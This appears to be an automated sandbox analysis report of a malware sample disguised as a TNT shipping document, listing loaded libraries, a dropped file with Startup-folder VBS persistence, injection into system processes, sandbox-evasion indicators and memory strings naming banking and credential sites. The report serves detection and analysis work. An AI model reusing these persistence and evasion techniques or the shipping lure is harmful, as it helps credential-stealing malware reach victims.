Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mobsync.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: TNT AWB TRACKING DETAILS.exe

Static file information: File size 1169920 > 1048576

Source: TNT AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: TNT AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: TNT AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: TNT AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: TNT AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: TNT AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: TNT AWB TRACKING DETAILS.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mobsync.pdbGCTL source: svchost.exe, 00000005.00000003.2768456836.0000000003231000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.2768020271.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.2768357686.000000000321A000.00000004.00000020.00020000.00000000.sdmp, RXSytTjWIT.exe, 0000000E.00000003.2884114394.00000000008F1000.00000004.00000001.00020000.00000000.sdmp, RXSytTjWIT.exe, 0000000E.00000003.2740926346.00000000008DB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RXSytTjWIT.exe, 0000000E.00000000.2713076461.000000000072E000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: wntdll.pdbUGP source: jailkeeper.exe, 00000004.00000003.2211714430.0000000003650000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000004.00000003.2209694261.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.2692776523.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2800804861.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2800804861.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.2690255416.0000000003500000.00000004.00000020.00020000.00000000.sdmp, jailkeeper.exe, 0000000A.00000003.2341869958.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 0000000A.00000003.2342252709.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 0000000A.00000003.2346293728.0000000003920000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2844392150.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2844392150.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2830902506.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2833018434.0000000003300000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.2802851636.0000000004076000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.3439572933.00000000043D0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.3439572933.000000000456E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.2805296168.0000000004220000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: jailkeeper.exe, 00000004.00000003.2211714430.0000000003650000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 00000004.00000003.2209694261.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000005.00000003.2692776523.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2800804861.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2800804861.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.2690255416.0000000003500000.00000004.00000020.00020000.00000000.sdmp, jailkeeper.exe, 0000000A.00000003.2341869958.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 0000000A.00000003.2342252709.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, jailkeeper.exe, 0000000A.00000003.2346293728.0000000003920000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2844392150.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2844392150.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2830902506.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.2833018434.0000000003300000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.2802851636.0000000004076000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.3439572933.00000000043D0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.3439572933.000000000456E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.2805296168.0000000004220000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mobsync.pdb source: svchost.exe, 00000005.00000003.2768456836.0000000003231000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.2768020271.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.2768357686.000000000321A000.00000004.00000020.00020000.00000000.sdmp, RXSytTjWIT.exe, 0000000E.00000003.2884114394.00000000008F1000.00000004.00000001.00020000.00000000.sdmp, RXSytTjWIT.exe, 0000000E.00000003.2740926346.00000000008DB000.00000004.00000020.00020000.00000000.sdmp

Source: TNT AWB TRACKING DETAILS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: TNT AWB TRACKING DETAILS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: TNT AWB TRACKING DETAILS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: TNT AWB TRACKING DETAILS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: TNT AWB TRACKING DETAILS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00AA4B37 LoadLibraryA,GetProcAddress,

0_2_00AA4B37

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AC8945 push ecx; ret	0_2_00AC8958
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0022C508 push A30022BAh; retn 0022h	4_2_0022C50D
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00248945 push ecx; ret	4_2_00248958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0041E9A4 push ecx; retf	5_2_0041E9A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00411B63 push es; iretd	5_2_00411B64
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00418C73 push ecx; iretd	5_2_00418C7A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0041EC7E push cs; iretd	5_2_0041EC7F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00407C3D pushad ; retf	5_2_00407C48
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004034C0 push eax; ret	5_2_004034C2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00418EE6 push es; iretd	5_2_00418EE7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040D7D7 push eax; ret	5_2_0040D7DC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040879B push 00000062h; retf	5_2_004087A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0390225F pushad ; ret	5_2_039027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039027FA pushad ; ret	5_2_039027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039309AD push ecx; mov dword ptr [esp], ecx	5_2_039309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0390283D push eax; iretd	5_2_03902858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03901368 push eax; iretd	5_2_03901369

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

File created: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs

Jump to behavior

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AA48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_00AA48D7
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B25376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_00B25376
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_002248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	4_2_002248D7
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_002A5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	4_2_002A5376

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00AC3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00AC3187

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	API/Special instruction interceptor: Address: D832B4
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	API/Special instruction interceptor: Address: 17B32B4
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\mobsync.exe	API/Special instruction interceptor: Address: 7FFDB442DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 5_2_0397096E rdtsc

5_2_0397096E

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_0-107558

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	API coverage: 5.0 %
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	API coverage: 5.1 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %

Source: C:\Windows\SysWOW64\mobsync.exe TID: 7800	Thread sleep count: 37 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe TID: 7800	Thread sleep time: -74000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\mobsync.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\mobsync.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B0445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00B0445A
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B0C6D1 FindFirstFileW,FindClose,	0_2_00B0C6D1
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B0C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00B0C75C
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B0EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B0EF95
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B0F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B0F0F2
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B0F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B0F3F3
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B037EF
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B03B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B03B12
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B0BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B0BCBC
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0028445A GetFileAttributesW,FindFirstFileW,FindClose,	4_2_0028445A
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0028C6D1 FindFirstFileW,FindClose,	4_2_0028C6D1
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0028C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	4_2_0028C75C
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0028EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	4_2_0028EF95
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0028F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	4_2_0028F0F2
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0028F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	4_2_0028F3F3
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_002837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	4_2_002837EF
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00283B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	4_2_00283B12
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0028BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	4_2_0028BCBC

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00AA49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00AA49A0

Source: w2-0G0-7.15.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: w2-0G0-7.15.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: w2-0G0-7.15.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: w2-0G0-7.15.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: w2-0G0-7.15.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: mobsync.exe, 0000000F.00000002.3437719389.0000000000408000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8%
Source: w2-0G0-7.15.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: w2-0G0-7.15.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: w2-0G0-7.15.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: w2-0G0-7.15.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: w2-0G0-7.15.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: w2-0G0-7.15.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: wscript.exe, 00000009.00000002.2328611516.00000208D87D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&22L
Source: w2-0G0-7.15.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: RXSytTjWIT.exe, 0000000E.00000002.3438507303.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.3101211342.00000173923DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: w2-0G0-7.15.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: w2-0G0-7.15.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: w2-0G0-7.15.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: w2-0G0-7.15.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: w2-0G0-7.15.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: w2-0G0-7.15.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: w2-0G0-7.15.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: w2-0G0-7.15.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: w2-0G0-7.15.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: w2-0G0-7.15.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: w2-0G0-7.15.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: w2-0G0-7.15.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: w2-0G0-7.15.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: w2-0G0-7.15.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: w2-0G0-7.15.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: w2-0G0-7.15.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: w2-0G0-7.15.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: w2-0G0-7.15.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
